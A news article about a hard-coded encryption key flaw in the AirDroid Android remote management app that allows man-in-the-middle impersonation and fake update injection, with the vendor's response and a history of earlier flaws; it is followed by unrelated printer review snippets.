Remote management app exposes millions of Android users to hacking

Man-in-the-middle attackers could exploit an AirDroid flaw to execute malicious code on devices

Poor implementation of encryption in a popular Android remote management application exposes millions of users to data theft and remote code execution attacks.

According to researchers from mobile security firm Zimperium, the AirDroid screen sharing and remote control application sends authentication information encrypted with a hard-coded key. This information could allow man-in-the-middle attackers to push out malicious AirDroid add-on updates, which would then gain the permissions of the app itself.

AirDroid has access to a device's contacts, location information, text messages, photos, call logs, dialer, camera, microphone and the contents of the SD card. It can also perform in-app purchases, change system settings, disable the screen lock, change network connectivity and much more.

The app, developed by an outfit called Sand Studio, has been in the Google Play store since 2011 and, according to its developers, has more than 20 million downloads.

While AirDroid uses encrypted HTTPS connections for most of its features, some functionality sends data to remote servers over plain HTTP, the Zimperium researchers said in a blog post. The developers attempted to secure this data using the Data Encryption Standard (DES), but the encryption key is static and hard-coded into the application itself, meaning that anyone can retrieve it, the researchers said.

One vulnerable feature involves the collection of statistics, which are sent by the app to a server using DES-encrypted JSON payloads. These payloads include identifiers such as the account_id, androidid, device_id, IMEI, IMSI, logic_key and unique_id.

A hacker in a position to intercept user traffic on a network could sniff AirDroid requests to the statistics-gathering server and use the hard-coded encryption key to decrypt the JSON payload. The account- and device-identifying information inside can then be used to impersonate the device to other servers accessed by the app.

"Having this information, the attacker can now impersonate the victim’s device and perform various HTTP or HTTPS requests on its behalf to the AirDroid API endpoints," the Zimperium researchers said.

For example, a man-in-the-middle attacker could redirect requests to the server used to check for AirDroid plug-in updates and then inject a fake update into the response. The user would be notified that an update is available and would likely install it, giving the malicious code access to AirDroid's permissions.

The Zimperium researchers claim that they notified the AirDroid developers about the problem in May and were informed in September about an upcoming update. New versions of AirDroid, 4.0.0 and 4.0.1, were released in November, but they're still vulnerable, according to Zimperium, so the researchers decided to make the vulnerability public.

An update that will fix this issue is expected to start rolling out within the next two weeks, said Betty Chen, chief marketing officer of Sand Studio, via email. The "boutique" development team needed time to develop the solution and synchronize the code of all its clients for different platforms and servers before starting to deploy the new encryption solution, which is not compatible with previous versions, she said.

There was some miscommunication, as the date the company gave out to Zimperium was for the release of AirDroid 4.0, which makes some related changes, but not the actual fix.

This is not the first time a serious vulnerability has been found in AirDroid. In April 2015, a researcher found that he could take over an Android device with AirDroid installed by simply sending a malicious link to the user via SMS. In February, researchers from Check Point found a way to exploit AirDroid to steal data from devices via maliciously crafted contact cards (vCards).

The Zimperium researchers recommend disabling or uninstalling the app until a fix for the latest issue is made available.

Join the PC World newsletter!

Error: Please check your email address.
Rocket to Success - Your 10 Tips for Smarter ERP System Selection
Keep up with the latest tech news, reviews and previews by subscribing to the Good Gear Guide newsletter.

Lucian Constantin

IDG News Service
Show Comments

Most Popular Reviews

Latest Articles


PCW Evaluation Team

Matthew Stivala

HP OfficeJet 250 Mobile Printer

The HP OfficeJet 250 Mobile Printer is a great device that fits perfectly into my fast paced and mobile lifestyle. My first impression of the printer itself was how incredibly compact and sleek the device was.

Armand Abogado

HP OfficeJet 250 Mobile Printer

Wireless printing from my iPhone was also a handy feature, the whole experience was quick and seamless with no setup requirements - accessed through the default iOS printing menu options.

Azadeh Williams

HP OfficeJet Pro 8730

A smarter way to print for busy small business owners, combining speedy printing with scanning and copying, making it easier to produce high quality documents and images at a touch of a button.

Andrew Grant

HP OfficeJet Pro 8730

I've had a multifunction printer in the office going on 10 years now. It was a neat bit of kit back in the day -- print, copy, scan, fax -- when printing over WiFi felt a bit like magic. It’s seen better days though and an upgrade’s well overdue. This HP OfficeJet Pro 8730 looks like it ticks all the same boxes: print, copy, scan, and fax. (Really? Does anyone fax anything any more? I guess it's good to know the facility’s there, just in case.) Printing over WiFi is more-or- less standard these days.

Ed Dawson

HP OfficeJet Pro 8730

As a freelance writer who is always on the go, I like my technology to be both efficient and effective so I can do my job well. The HP OfficeJet Pro 8730 Inkjet Printer ticks all the boxes in terms of form factor, performance and user interface.

Michael Hargreaves

Windows 10 for Business / Dell XPS 13

I’d happily recommend this touchscreen laptop and Windows 10 as a great way to get serious work done at a desk or on the road.

Featured Content

Latest Jobs

Don’t have an account? Sign up here

Don't have an account? Sign up now

Forgot password?